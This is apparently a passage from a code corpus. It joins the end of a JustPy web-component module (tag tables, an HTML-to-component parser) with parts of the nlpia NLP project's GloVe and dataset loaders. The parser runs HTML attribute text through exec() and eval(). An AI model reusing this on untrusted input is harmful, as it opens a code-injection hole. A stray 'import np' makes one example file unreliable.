['autofocus', 'disabled', 'form', 'formaction', 'formenctype', 'formmethod', 'formnovalidate', 'formtarget', 'name', 'type', 'value'], 'canvas': ['height', 'width'], 'col': ['span'], 'colgroup': ['span'], 'data': ['value'], 'del': ['cite', 'datetime'], 'details': ['open'], 'dialog': ['open'], 'embed': ['height', 'src', 'type', 'width'], 'fieldset': ['disabled', 'form', 'name'], 'form': ['accept-charset', 'action', 'autocomplete', 'enctype', 'method', 'name', 'novalidate', 'target'], 'html': ['xmlns'], 'iframe': ['height', 'name', 'sandbox', 'src', 'srcdoc', 'width'], 'img': ['alt', 'crossorigin', 'height', 'ismap', 'longdesc', 'sizes', 'src', 'srcset', 'usemap', 'width'], 'input': ['accept', 'alt', 'autocomplete', 'autofocus', 'checked', 'dirname', 'disabled', 'form', 'formaction', 'formenctype', 'formmethod', 'formnovalidate', 'formtarget', 'height', 'list', 'max', 'maxlength', 'min', 'minlength', 'multiple', 'name', 'pattern', 'placeholder', 'readonly', 'required', 'size', 'src', 'step', 'type', 'value', 'width'], 'ins': ['cite', 'datetime'], 'label': ['for', 'form'], 'li': ['value'], 'link': ['crossorigin', 'href', 'hreflang', 'media', 'rel', 'sizes', 'type'], 'map': ['name'], 'meta': ['charset', 'content', 'http-equiv', 'name'], 'meter': ['form', 'high', 'low', 'max', 'min', 'optimum', 'value'], 'object': ['data', 'form', 'height', 'name', 'type', 'usemap', 'width'], 'ol': ['reversed', 'start', 'type'], 'optgroup': ['disabled', 'label'], 'option': ['disabled', 'label', 'selected', 'value'], 'output': ['for', 'form', 'name'], 'param': ['name', 'value'], 'progress': ['max', 'value'], 'q': ['cite'], 'script': ['async', 'charset', 'defer', 'src', 'type'], 'select': ['autofocus', 'disabled', 'form', 'multiple', 'name', 'required', 'size'], 'source': ['src', 'srcset', 'media', 'sizes', 'type'], 'style': ['media', 'type'], 'td': ['colspan', 'headers', 'rowspan'], 'textarea': ['autofocus', 'cols', 'dirname', 'disabled', 'form', 'maxlength', 'name', 'placeholder', 'readonly', 'required', 'rows', 'wrap'], 'th': ['abbr', 'colspan', 'headers', 'rowspan', 'scope', 'sorted'], 'time': ['datetime'], 'track': ['default', 'kind', 'label', 'src', 'srclang'], 'video': ['autoplay', 'controls', 'height', 'loop', 'muted', 'poster', 'preload', 'src', 'width']} # Name definition for static syntax analysers # Classes are defined dynamically right after, this is just to assist code editors Address = Article = Aside = Footer = Header = H1 = H2 = H3 = H4 = H5 = H6 = Main = Nav = Section = Blockquote = Dd = Dl = Dt = Figcaption = Figure = Hr = Li = Ol = P = Pre = Ul = Abbr = B = Bdi = Bdo = Br = Cite = Code = Data = Dfn = Em = I = Kbd = Mark = Q = Rb = Rp = Rt = Rtc = Ruby = S = Samp = Small = Span = Strong = Sub = Sup = Time = Tt = U = Var = Wbr = Area = Audio = Img = Map = Track = Video = Embed = Iframe = Object = Param = Picture = Source = Del = Ins = Caption = Col = Colgroup = Table = Tbody = Td = Tfoot = Th = Thead = Tr = Button = Fieldset = Legend = Meter = Optgroup = Option = Progress = Details = Summary = None Animate = AnimateMotion = AnimateTransform = Circle = ClipPath = Defs = Desc = Discard = Ellipse = FeBlend = FeColorMatrix = FeComponentTransfer = FeComposite = FeConvolveMatrix = FeDiffuseLighting = FeDisplacementMap = FeDistantLight = FeDropShadow = FeFlood = FeFuncA = FeFuncB = FeFuncG = FeFuncR = FeGaussianBlur = FeImage = FeMerge = FeMergeNode = FeMorphology = FeOffset = FePointLight = FeSpecularLighting = FeSpotLight = FeTile = FeTurbulence = Filter = ForeignObject = G = Image = Line = LinearGradient = Marker = Mask = Metadata = Mpath = Path = Pattern = Polygon = Polyline = RadialGradient = Rect = Set = Stop = Svg = Switch = Symbol = Text = TextPath = Tspan = Use = View = None # Tag classes defined dynamically at runtime for tag in _tag_create_list: globals()[tag.capitalize()] = type(tag.capitalize(), (Div,), {'html_tag': tag, 'attributes': _attr_dict.get(tag, [])}) # ********************************** # SVG components # https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute # in, in2, mode svg_tags = ['a', 'animate', 'animateMotion', 'animateTransform', 'audio', 'canvas', 'circle', 'clipPath', 'defs', 'desc', 'discard', 'ellipse', 'feBlend', 'feColorMatrix', 'feComponentTransfer', 'feComposite', 'feConvolveMatrix', 'feDiffuseLighting', 'feDisplacementMap', 'feDistantLight', 'feDropShadow', 'feFlood', 'feFuncA', 'feFuncB', 'feFuncG', 'feFuncR', 'feGaussianBlur', 'feImage', 'feMerge', 'feMergeNode', 'feMorphology', 'feOffset', 'fePointLight', 'feSpecularLighting', 'feSpotLight', 'feTile', 'feTurbulence', 'filter', 'foreignObject', 'g', 'iframe', 'image', 'line', 'linearGradient', 'marker', 'mask', 'metadata', 'mpath', 'path', 'pattern', 'polygon', 'polyline', 'radialGradient', 'rect', 'script', 'set', 'stop', 'style', 'svg', 'switch', 'symbol', 'text', 'textPath', 'title', 'tspan', 'unknown', 'use', 'video', 'view'] svg_tags_use = ['animate', 'animateMotion', 'animateTransform', 'circle', 'clipPath', 'defs', 'desc', 'discard', 'ellipse', 'feBlend', 'feColorMatrix', 'feComponentTransfer', 'feComposite', 'feConvolveMatrix', 'feDiffuseLighting', 'feDisplacementMap', 'feDistantLight', 'feDropShadow', 'feFlood', 'feFuncA', 'feFuncB', 'feFuncG', 'feFuncR', 'feGaussianBlur', 'feImage', 'feMerge', 'feMergeNode', 'feMorphology', 'feOffset', 'fePointLight', 'feSpecularLighting', 'feSpotLight', 'feTile', 'feTurbulence', 'filter', 'foreignObject', 'g', 'image', 'line', 'linearGradient', 'marker', 'mask', 'metadata', 'mpath', 'path', 'pattern', 'polygon', 'polyline', 'radialGradient', 'rect', 'set', 'stop', 'svg', 'switch', 'symbol', 'text', 'textPath', 'tspan', 'use', 'view'] svg_presentation_attributes = ['alignment-baseline', 'baseline-shift', 'clip', 'clip-path', 'clip-rule', 'color', 'color-interpolation', 'color-interpolation-filters', 'color-profile', 'color-rendering', 'cursor', 'direction', 'display', 'dominant-baseline', 'enable-background', 'fill', 'fill-opacity', 'fill-rule', 'filter', 'flood-color', 'flood-opacity', 'font-family', 'font-size', 'font-size-adjust', 'font-stretch', 'font-style', 'font-variant', 'font-weight', 'glyph-orientation-horizontal', 'glyph-orientation-vertical', 'image-rendering', 'kerning', 'letter-spacing', 'lighting-color', 'marker-end', 'marker-mid', 'marker-start', 'mask', 'opacity', 'overflow', 'pointer-events', 'shape-rendering', 'stop-color', 'stop-opacity', 'stroke', 'stroke-dasharray', 'stroke-dashoffset', 'stroke-linecap', 'stroke-linejoin', 'stroke-miterlimit', 'stroke-opacity', 'stroke-width', 'text-anchor', 'transform', 'text-decoration', 'text-rendering', 'unicode-bidi', 'vector-effect', 'visibility', 'word-spacing', 'writing-mode', 'cx', 'cy', 'r', 'rx', 'ry', 'd', 'fill', 'transform'] svg_filter_attributes = ['height', 'result', 'width', 'x', 'y', 'type', 'tableValues', 'slope', 'intercept', 'amplitude', 'exponent', 'offset', 'xlink:href'] svg_animation_attributes = ['attributeType', 'attributeName', 'begin', 'dur', 'end', 'min', 'max', 'restart', 'repeatCount', 'repeatDur', 'fill', 'calcMode', 'values', 'keyTimes', 'keySplines', 'from', 'to', 'by', 'additive', 'accumulate'] svg_attr_dict = {'a': ['download', 'requiredExtensions', 'role', 'systemLanguage'], 'animate': ['accumulate', 'additive', 'attributeName', 'begin', 'by', 'calcMode', 'dur', 'end', 'fill', 'from', 'href', 'keySplines', 'keyTimes', 'max', 'min', 'repeatCount', 'repeatDur', 'requiredExtensions', 'restart', 'systemLanguage', 'to', 'values'], 'animateMotion': ['accumulate', 'additive', 'begin', 'by', 'calcMode', 'dur', 'end', 'fill', 'from', 'href', 'keyPoints', 'keySplines', 'keyTimes', 'max', 'min', 'origin', 'path', 'repeatCount', 'repeatDur', 'requiredExtensions', 'restart', 'rotate', 'systemLanguage', 'to', 'values'], 'animateTransform': ['accumulate', 'additive', 'attributeName', 'begin', 'by', 'calcMode', 'dur', 'end', 'fill', 'from', 'href', 'keySplines', 'keyTimes', 'max', 'min', 'repeatCount', 'repeatDur', 'requiredExtensions', 'restart', 'systemLanguage', 'to', 'type', 'values'], 'audio': ['requiredExtensions', 'role', 'systemLanguage'], 'canvas': ['preserveAspectRatio', 'requiredExtensions', 'role', 'systemLanguage'], 'circle': ['pathLength', 'requiredExtensions', 'role', 'systemLanguage'], 'clipPath': ['clipPathUnits', 'requiredExtensions', 'systemLanguage'], 'discard': ['begin', 'href', 'requiredExtensions', 'role', 'systemLanguage'], 'ellipse': ['pathLength', 'requiredExtensions', 'role', 'systemLanguage'], 'feBlend': ['height', 'in', 'in2', 'mode', 'result', 'width', 'x', 'y'], 'feColorMatrix': ['height', 'in', 'result', 'type', 'values', 'width', 'x', 'y'], 'feComponentTransfer': ['height', 'in', 'result', 'width', 'x', 'y'], 'feComposite': ['height', 'in', 'in2', 'k1', 'k2', 'k3', 'k4', 'operator', 'result', 'width', 'x', 'y'], 'feConvolveMatrix': ['bias', 'divisor', 'edgeMode', 'height', 'in', 'kernelMatrix', 'kernelUnitLength', 'order', 'preserveAlpha', 'result', 'targetX', 'targetY', 'width', 'x', 'y'], 'feDiffuseLighting': ['diffuseConstant', 'height', 'in', 'kernelUnitLength', 'result', 'surfaceScale', 'width', 'x', 'y'], 'feDisplacementMap': ['height', 'in', 'in2', 'result', 'scale', 'width', 'x', 'xChannelSelector', 'y', 'yChannelSelector'], 'feDistantLight': ['azimuth', 'elevation'], 'feDropShadow': ['dx', 'dy', 'height', 'in', 'result', 'stdDeviation', 'width', 'x', 'y'], 'feFlood': ['height', 'result', 'width', 'x', 'y'], 'feFuncA': ['amplitude', 'exponent', 'intercept', 'offset', 'slope', 'tableValues', 'type'], 'feFuncB': ['amplitude', 'exponent', 'intercept', 'offset', 'slope', 'tableValues', 'type'], 'feFuncG': ['amplitude', 'exponent', 'intercept', 'offset', 'slope', 'tableValues', 'type'], 'feFuncR': ['amplitude', 'exponent', 'intercept', 'offset', 'slope', 'tableValues', 'type'], 'feGaussianBlur': ['edgeMode', 'height', 'in', 'result', 'stdDeviation', 'width', 'x', 'y'], 'feImage': ['crossorigin', 'height', 'href', 'preserveAspectRatio', 'result', 'width', 'x', 'y'], 'feMerge': ['height', 'result', 'width', 'x', 'y'], 'feMergeNode': ['in'], 'feMorphology': ['height', 'in', 'operator', 'radius', 'result', 'width', 'x', 'y'], 'feOffset': ['dx', 'dy', 'height', 'in', 'result', 'width', 'x', 'y'], 'fePointLight': ['x', 'y', 'z'], 'feSpecularLighting': ['height', 'in', 'kernelUnitLength', 'result', 'specularConstant', 'specularExponent', 'surfaceScale', 'width', 'x', 'y'], 'feSpotLight': ['limitingConeAngle', 'pointsAtX', 'pointsAtY', 'pointsAtZ', 'specularExponent', 'x', 'y', 'z'], 'feTile': ['height', 'in', 'result', 'width', 'x', 'y'], 'feTurbulence': ['baseFrequency', 'height', 'numOctaves', 'result', 'seed', 'stitchTiles', 'type', 'width', 'x', 'y'], 'filter': ['filterUnits', 'height', 'primitiveUnits', 'width', 'x', 'y'], 'foreignObject': ['requiredExtensions', 'role', 'systemLanguage'], 'g': ['requiredExtensions', 'role', 'systemLanguage'], 'iframe': ['requiredExtensions', 'role', 'systemLanguage'], 'image': ['crossorigin', 'href', 'preserveAspectRatio', 'requiredExtensions', 'role', 'systemLanguage'], 'line': ['pathLength', 'requiredExtensions', 'role', 'systemLanguage', 'x1', 'x2', 'y1', 'y2'], 'linearGradient': ['gradientTransform', 'gradientUnits', 'href', 'spreadMethod', 'x1', 'x2', 'y1', 'y2'], 'marker': ['markerHeight', 'markerUnits', 'markerWidth', 'orient', 'preserveAspectRatio', 'refX', 'refY', 'viewBox'], 'mask': ['height', 'maskContentUnits', 'maskUnits', 'requiredExtensions', 'systemLanguage', 'width', 'x', 'y'], 'mpath': ['href'], 'path': ['pathLength', 'requiredExtensions', 'role', 'systemLanguage'], 'pattern': ['height', 'href', 'patternContentUnits', 'patternTransform', 'patternUnits', 'preserveAspectRatio', 'viewBox', 'width', 'x', 'y'], 'polygon': ['pathLength', 'points', 'requiredExtensions', 'role', 'systemLanguage'], 'polyline': ['pathLength', 'points', 'requiredExtensions', 'role', 'systemLanguage'], 'radialGradient': ['cx', 'cy', 'fr', 'fx', 'fy', 'gradientTransform', 'gradientUnits', 'href', 'r', 'spreadMethod'], 'rect': ['pathLength', 'requiredExtensions', 'role', 'systemLanguage'], 'script': ['href'], 'set': ['attributeName', 'begin', 'dur', 'end', 'fill', 'href', 'max', 'min', 'repeatCount', 'repeatDur', 'requiredExtensions', 'restart', 'systemLanguage', 'to'], 'stop': ['offset'], 'style': ['media'], 'svg': ['playbackorder', 'preserveAspectRatio', 'requiredExtensions', 'role', 'systemLanguage', 'timelinebegin', 'transform', 'viewBox', 'zoomAndPan', 'xmlns', 'version'], 'switch': ['requiredExtensions', 'role', 'systemLanguage'], 'symbol': ['preserveAspectRatio', 'refX', 'refY', 'role', 'viewBox'], 'text': ['dx', 'dy', 'lengthAdjust', 'requiredExtensions', 'role', 'rotate', 'systemLanguage', 'textLength', 'x', 'y'], 'textPath': ['href', 'lengthAdjust', 'method', 'path', 'requiredExtensions', 'role', 'side', 'spacing', 'startOffset', 'systemLanguage', 'textLength'], 'tspan': ['dx', 'dy', 'lengthAdjust', 'requiredExtensions', 'role', 'rotate', 'systemLanguage', 'textLength', 'x', 'y'], 'unknown': ['requiredExtensions', 'role', 'systemLanguage'], 'use': ['href', 'requiredExtensions', 'role', 'systemLanguage'], 'video': ['requiredExtensions', 'role', 'systemLanguage'], 'view': ['preserveAspectRatio', 'role', 'viewBox', 'zoomAndPan']} for tag in svg_tags_use: c_tag = tag[0].capitalize() + tag[1:] globals()[c_tag] = type(c_tag, (Div,), {'html_tag': tag, 'attributes': svg_attr_dict.get(tag, []) + svg_presentation_attributes + svg_filter_attributes}) # *************************** end SVG components class HTMLEntity(Span): # Render HTML Entities def __init__(self, **kwargs): self.entity = '' super().__init__(**kwargs) def convert_object_to_dict(self): d = super().convert_object_to_dict() d['inner_html'] = self.entity return d class Hello(Div): def __init__(self, **kwargs): self.counter = 1 super().__init__(**kwargs) self.classes = 'm-1 p-1 text-2xl text-center text-white bg-blue-500 hover:bg-blue-800 cursor-pointer' self.text = 'Hello! (click me)' async def click(self, msg): self.text = f'Hello! I was clicked {self.counter} times' self.counter += 1 self.on('click', click) class QHello(Hello): def __init__(self, **kwargs): super().__init__(**kwargs) self.classes = 'text-h3 text-primary q-ma-md' def component_by_tag(tag, **kwargs): # tag = tag.lower() if tag[0:2] == 'q-': if tag in _tag_class_dict: c = _tag_class_dict[tag](**kwargs) else: raise ValueError(f'Tag not defined: {tag}') else: tag_class_name = tag[0].capitalize() + tag[1:] try: c = globals()[tag_class_name](**kwargs) except: raise ValueError(f'Tag not defined: {tag}') return c class AutoTable(Table): """ Creates an HTML table from a list of lists First list is used as headers """ td_classes = 'border px-4 py-2 text-center' tr_even_classes = 'bg-gray-100 ' tr_odd_classes = '' th_classes = 'px-4 py-2' def __init__(self, **kwargs): self.values = [] super().__init__(**kwargs) def react(self, data): self.set_class('table-auto') # First row of values is header if self.values: headers = self.values[0] thead = Thead(a=self) tr = Tr(a=thead) for item in headers: Th(text=item, classes=self.th_classes, a=tr) tbody = Tbody(a=self) for i, row in enumerate(self.values[1:]): if i % 2 == 1: tr = Tr(classes=self.tr_even_classes, a=tbody) else: tr = Tr(classes=self.tr_odd_classes, a=tbody) for item in row: Td(text=item, classes=self.td_classes, a=tr) get_tag = component_by_tag class BasicHTMLParser(HTMLParser): # Void elements do not need closing tag void_elements = ['area', 'base', 'br', 'col', 'embed', 'hr', 'img', 'input', 'keygen', 'link', 'menuitem', 'meta', 'param', 'source', 'track', 'wbr'] def __init__(self, context, **kwargs): super().__init__() self.context = context self.level = -1 self.parse_id = 0 self.start_tag = True self.components = [] self.name_dict = Dict() # After parsing holds a dict with named components self.dict_attribute = kwargs.get('dict_attribute', 'name') # Use another attribute than name self.root = Div(name='root') self.containers = [] self.containers.append(self.root) self.endtag_required = True self.create_commands = kwargs.get('create_commands', True) # If True, create the justpy command list self.command_prefix = kwargs.get('command_prefix', 'jp.') # Prefix for commands generated, defaults to 'jp.' if self.create_commands: # List of command strings (justpy python code to generate the element) self.commands = [f"root = {self.command_prefix}Div()"] else: self.commands = '' def parse_starttag(self, i): # This is the original library method with two changes to stop tags and attributes being lower case # This is required for the SVG tags which can be camelcase # https://github.com/python/cpython/blob/3.7/Lib/html/parser.py self.__starttag_text = None endpos = self.check_for_whole_start_tag(i) if endpos < 0: return endpos rawdata = self.rawdata self.__starttag_text = rawdata[i:endpos] # Now parse the data between i+1 and j into a tag and attrs attrs = [] match = tagfind_tolerant.match(rawdata, i + 1) assert match, 'unexpected call to parse_starttag()' k = match.end() # self.lasttag = tag = match.group(1).lower() was the original self.lasttag = tag = match.group(1) while k < endpos: m = attrfind_tolerant.match(rawdata, k) if not m: break attrname, rest, attrvalue = m.group(1, 2, 3) if not rest: attrvalue = None elif attrvalue[:1] == '\'' == attrvalue[-1:] or \ attrvalue[:1] == '"' == attrvalue[-1:]: attrvalue = attrvalue[1:-1] if attrvalue: attrvalue = unescape(attrvalue) # attrs.append((attrname.lower(), attrvalue)) was the original attrs.append((attrname, attrvalue)) k = m.end() end = rawdata[k:endpos].strip() if end not in (">", "/>"): lineno, offset = self.getpos() if "\n" in self.__starttag_text: lineno = lineno + self.__starttag_text.count("\n") offset = len(self.__starttag_text) \ - self.__starttag_text.rfind("\n") else: offset = offset + len(self.__starttag_text) self.handle_data(rawdata[i:endpos]) return endpos if end.endswith('/>'): # XHTML-style empty tag: <span attr="value" /> self.handle_startendtag(tag, attrs) else: self.handle_starttag(tag, attrs) if tag in self.CDATA_CONTENT_ELEMENTS: self.set_cdata_mode(tag) return endpos def handle_startendtag(self, tag, attrs): self.handle_starttag(tag, attrs) if self.endtag_required: self.handle_endtag(tag) else: self.endtag_required = True def handle_starttag(self, tag, attrs): self.level = self.level + 1 self.parse_id += 1 c = component_by_tag(tag) c.parse_id = self.parse_id command_string = f'' if c is None: print(tag, 'No such tag, Div being used instead *****************************************') c = Div() for attr in attrs: attr = list(attr) attr[0] = attr[0].replace('-', '_') if attr[0][0] == '@': if attr[1] in self.context.f_locals: c.on(attr[0][1:], self.context.f_locals[attr[1]]) elif attr[1] in self.context.f_globals: c.on(attr[0][1:], self.context.f_globals[attr[1]]) else: cls = JustpyBaseComponent if not c.id: c.id = cls.next_id cls.next_id += 1 fn_string = f'def oneliner{c.id}(self, msg):\n {attr[1]}' # remove first and last charcters which are quotes exec(fn_string) c.on(attr[0][1:], locals()[f'oneliner{c.id}']) continue if attr[0][0] == ':': attr[0] = attr[0][1:] attr[1] = eval(attr[1]) if attr[0] == 'id': c.id = attr[1] continue if attr[1] is None: setattr(c, attr[0], True) attr[1] = True else: setattr(c, attr[0], attr[1]) # Add to name to dict of named components. Each entry can be a list of components to allow multiple components with same name if attr[0] == self.dict_attribute: if attr[1] not in self.name_dict: self.name_dict[attr[1]] = c else: if not isinstance(self.name_dict[attr[1]], (list,)): self.name_dict[attr[1]] = [self.name_dict[attr[1]]] self.name_dict[attr[1]].append(c) if attr[0] == 'class': c.classes = attr[1] attr[0] = 'classes' # Handle attributes that are also python reserved words if attr[0] in ['in', 'from']: attr[0] = '_' + attr[0] if self.create_commands: if isinstance(attr[1], str): command_string = f"{command_string}{attr[0]}='{attr[1]}', " else: command_string = f'{command_string}{attr[0]}={attr[1]}, ' if self.create_commands: if id(self.containers[-1]) == id(self.root): command_string = f'c{c.parse_id} = {self.command_prefix}{c.class_name}({command_string}a=root)' else: command_string = f'c{c.parse_id} = {self.command_prefix}{c.class_name}({command_string}a=c{self.containers[-1].parse_id})' self.commands.append(command_string) self.containers[-1].add_component(c) self.containers.append(c) if tag in BasicHTMLParser.void_elements: self.handle_endtag(tag) self.endtag_required = False else: self.endtag_required = True def handle_endtag(self, tag): c = self.containers.pop() del c.parse_id self.level = self.level - 1 def handle_data(self, data): data = data.strip() if data: self.containers[-1].text = data data = data.replace("'", "\\'") if self.create_commands: self.commands[-1] = f"{self.commands[-1][:-1]}, text='{data}')" return def handle_comment(self, data): pass def handle_entityref(self, name): c = chr(name2codepoint[name]) def handle_charref(self, name): if name.startswith('x'): c = chr(int(name[1:], 16)) else: c = chr(int(name)) def handle_decl(self, data): pass def justPY_parser(html_string, context, **kwargs): ''' Returns root component of the parser with the name_dict as attribute. If root component has only one child, returns the child ''' parser = BasicHTMLParser(context, **kwargs) parser.feed(html_string) if len(parser.root.components) == 1: parser_result = parser.root.components[0] else: parser_result = parser.root parser_result.name_dict = parser.name_dict parser_result.commands = parser.commands parser_result.initialize(**kwargs) return parser_result def parse_html(html_string, **kwargs): return justPY_parser(html_string, inspect.stack()[1][0], **kwargs) def parse_html_file(html_file, **kwargs): with open(html_file, encoding="utf-8") as f: return justPY_parser(f.read(), inspect.stack()[1][0], **kwargs) try: import aiofiles _has_aiofiles = True except: _has_aiofiles = False if _has_aiofiles: async def parse_html_file_async(html_file, **kwargs): async with aiofiles.open(html_file, encoding="utf-8") as f: s = await f.read() return justPY_parser(s, **kwargs) else: async def parse_html_file_async(html_file, **kwargs): raise Exception('aiofiles not installed') async def get(url, format='json'): async with httpx.AsyncClient() as client: result = await client.get(url) if format == 'json': return result.json() else: return result.text def get_websocket(event_data): return WebPage.sockets[event_data['page_id']][event_data['websocket_id']] def create_transition(): return Dict({'enter': '', 'enter_start': '', 'enter_end': '', 'leave': '', 'leave_start': '', 'leave_end': '', 'load': '', 'load_start': '', 'load_end': '' }) class Styles: button_simple = 'bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded' button_pill = 'bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded-full' button_outline = 'bg-transparent hover:bg-blue-500 text-blue-700 font-semibold hover:text-white py-2 px-4 border border-blue-500 hover:border-transparent rounded' button_bordered = 'bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 border border-blue-700 rounded' button_disabled = 'bg-blue-500 text-white font-bold py-2 px-4 rounded opacity-50 cursor-not-allowed' button_3d = 'bg-blue-500 hover:bg-blue-400 text-white font-bold py-2 px-4 border-b-4 border-blue-700 hover:border-blue-500 rounded' button_elevated = 'bg-white hover:bg-gray-100 text-gray-800 font-semibold py-2 px-4 border border-gray-400 rounded shadow' input_classes = "m-2 bg-gray-200 border-2 border-gray-200 rounded w-64 py-2 px-4 text-gray-700 focus:outline-none focus:bg-white focus:border-purple-500" # https://www.lipsum.com / lorem_ipsum = """ Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. """ ```
{ "source": "AAAI-DISIM-UnivAQ/nlpia", "score": 3 }
#### File: book/examples/ch06_glove_nessvectors.py ```python import np def load_glove(filepath): # print("Loading Glove Model") f = open(filepath, 'r') wv = {} for line in f: splitLines = line.split() word = splitLines[0] embedding = np.array([float(value) for value in splitLines[1:]]) wv[word] = embedding # print(len(wv), " words loaded!") return wv ``` #### File: src/nlpia/loaders.py ```python from __future__ import print_function, unicode_literals, division, absolute_import from builtins import (bytes, dict, int, list, object, range, str, # noqa ascii, chr, hex, input, next, oct, open, pow, round, super, filter, map, zip) from future import standard_library standard_library.install_aliases() # noqa from past.builtins import basestring # from traceback import format_exc import os import re import json import logging import shutil from traceback import format_exc from zipfile import ZipFile from math import ceil from itertools import product, zip_longest from requests.exceptions import ConnectionError, InvalidURL, InvalidSchema, InvalidHeader, MissingSchema from urllib.error import URLError from copy import deepcopy import pandas as pd import tarfile import ftplib import spacy from gensim.models import KeyedVectors from gensim.models.keyedvectors import REAL, Vocab from gensim.scripts.glove2word2vec import glove2word2vec from pugnlp.util import clean_columns from nlpia.constants import DATA_PATH, BIGDATA_PATH from nlpia.constants import DATA_INFO_FILE, BIGDATA_INFO_FILE, BIGDATA_INFO_LATEST from nlpia.constants import INT_MIN, INT_NAN, MIN_DATA_FILE_SIZE from nlpia.constants import EOL # noqa (not used) from nlpia.constants import tqdm, no_tqdm from nlpia.futil import mkdir_p, path_status, find_files # from pugnlp.futil from nlpia.futil import find_filepath, expand_filepath, normalize_filepath, normalize_ext, ensure_open from nlpia.futil import read_json, read_text, read_csv from nlpia.web import get_url_filemeta from nlpia.web import dropbox_basename, get_url_title, try_parse_url # noqa (not used) from nlpia.web import requests_get import ipdb _parse = None # placeholder for SpaCy parser + language model np = pd.np log = logging.getLogger(__name__) log.setLevel(logging.DEBUG) # logging.config.dictConfig(LOGGING_CONFIG) # # doesn't display line number, etc # if os.environ.get('DEBUG'): # logging.basicConfig(level=logging.DEBUG) # SMALLDATA_URL = 'http://totalgood.org/static/data' W2V_FILES = [ 'GoogleNews-vectors-negative300.bin.gz', 'glove.6B.zip', 'glove.twitter.27B.zip', 'glove.42B.300d.zip', 'glove.840B.300d.zip', ] # You probably want to `rm nlpia/src/nlpia/data/bigdata_info.csv` if you modify any of these # so they don't overwrite what you hardcode within loaders.py here: ZIP_FILES = { 'GoogleNews-vectors-negative300.bin.gz': None, 'glove.6B.zip': ['glove.6B.50d.w2v.txt', 'glove.6B.100d.w2v.txt', 'glove.6B.200d.w2v.txt', 'glove.6B.300d.w2v.txt'], 'glove.twitter.27B.zip': None, 'glove.42B.300d.zip': None, 'glove.840B.300d.zip': None, } ZIP_PATHS = [[os.path.join(BIGDATA_PATH, fn) for fn in ZIP_FILES[k]] if ZIP_FILES[k] else k for k in ZIP_FILES.keys()] harry_docs = ["The faster Harry got to the store, the faster and faster Harry would get home.", "Harry is hairy and faster than Jill.", "Jill is not as hairy as Harry."] def load_imdb_df(dirpath=os.path.join(BIGDATA_PATH, 'aclImdb'), subdirectories=(('train', 'test'), ('pos', 'neg', 'unsup'))): """ Walk directory tree starting at `path` to compile a DataFrame of movie review text labeled with their 1-10 star ratings Returns: DataFrame: columns=['url', 'rating', 'text'], index=MultiIndex(['train_test', 'pos_neg_unsup', 'id']) TODO: Make this more robust/general by allowing the subdirectories to be None and find all the subdirs containing txt files >> imdb_df().head() url rating text index0 index1 index2 train pos 0 http://www.imdb.com/title/tt0453418 9 Bromwell High is a cartoon comedy. It ran at t... 1 http://www.imdb.com/title/tt0210075 7 If you like adult comedy cartoons, like South ... 2 http://www.imdb.com/title/tt0085688 9 Bromwell High is nothing short of brilliant. E... 3 http://www.imdb.com/title/tt0033022 10 "All the world's a stage and its people actors... 4 http://www.imdb.com/title/tt0043137 8 FUTZ is the only show preserved from the exper... """ dfs = {} for subdirs in tqdm(list(product(*subdirectories))): urlspath = os.path.join(dirpath, subdirs[0], 'urls_{}.txt'.format(subdirs[1])) if not os.path.isfile(urlspath): if subdirs != ('test', 'unsup'): # test/ dir doesn't usually have an unsup subdirectory log.warning('Unable to find expected IMDB review list of URLs: {}'.format(urlspath)) continue df = pd.read_csv(urlspath, header=None, names=['url']) # df.index.name = 'id' df['url'] = series_strip(df.url, endswith='/usercomments') textsdir = os.path.join(dirpath, subdirs[0], subdirs[1]) if not os.path.isdir(textsdir): log.warning('Unable to find expected IMDB review text subdirectory: {}'.format(textsdir)) continue filenames = [fn for fn in os.listdir(textsdir) if fn.lower().endswith('.txt')] df['index0'] = subdirs[0] # TODO: column names more generic so will work on other datasets df['index1'] = subdirs[1] df['index2'] = np.array([int(fn[:-4].split('_')[0]) for fn in filenames]) df['rating'] = np.array([int(fn[:-4].split('_')[1]) for fn in filenames]) texts = [] for fn in filenames: with ensure_open(os.path.join(textsdir, fn)) as f: texts.append(f.read()) df['text'] = np.array(texts) del texts df.set_index('index0 index1 index2'.split(), inplace=True) df.sort_index(inplace=True) dfs[subdirs] = df return pd.concat(dfs.values()) def load_glove(filepath, batch_size=1000, limit=None, verbose=True): r""" Load a pretrained GloVE word vector model First header line of GloVE text file should look like: 400000 50\n First vector of GloVE text file should look like: the .12 .22 .32 .42 ... .42 >>> wv = load_glove(os.path.join(BIGDATA_PATH, 'glove_test.txt')) >>> wv.most_similar('and')[:3] [(',', 0.92...), ('.', 0.91...), ('of', 0.86...)] """ num_dim = isglove(filepath) tqdm_prog = tqdm if verbose else no_tqdm wv = KeyedVectors(num_dim) if limit: vocab_size = int(limit) else: with ensure_open(filepath) as fin: for i, line in enumerate(fin): pass vocab_size = i + 1 wv.vectors = np.zeros((vocab_size, num_dim), REAL) with ensure_open(filepath) as fin: batch, words = [], [] for i, line in enumerate(tqdm_prog(fin, total=vocab_size)): line = line.split() word = line[0] vector = np.array(line[1:]).astype(float) # words.append(word) # batch.append(vector) wv.index2word.append(word) wv.vocab[word] = Vocab(index=i, count=vocab_size - i) wv.vectors[i] = vector if len(words) >= batch_size: # wv[words] = np.array(batch) batch, words = [], [] if i >= vocab_size - 1: break if words: wv[words] = np.array(batch) return wv def load_glove_df(filepath, **kwargs): """ Load a GloVE-format text file into a dataframe >>> df = load_glove_df(os.path.join(BIGDATA_PATH, 'glove_test.txt')) >>> df.index[:3] Index(['the', ',', '.'], dtype='object', name=0) >>> df.iloc[0][:3] 1 0.41800 2 0.24968 3 -0.41242 Name: the, dtype: float64 """ pdkwargs = dict(index_col=0, header=None, sep=r'\s', skiprows=[0], verbose=False, engine='python') pdkwargs.update(kwargs) return pd.read_csv(filepath, **pdkwargs) # def load_glove_format(filepath): # """ https://stackoverflow.com/questions/37793118/load-pretrained-glove-vectors-in-python#45894001 """ # # glove_input_file = 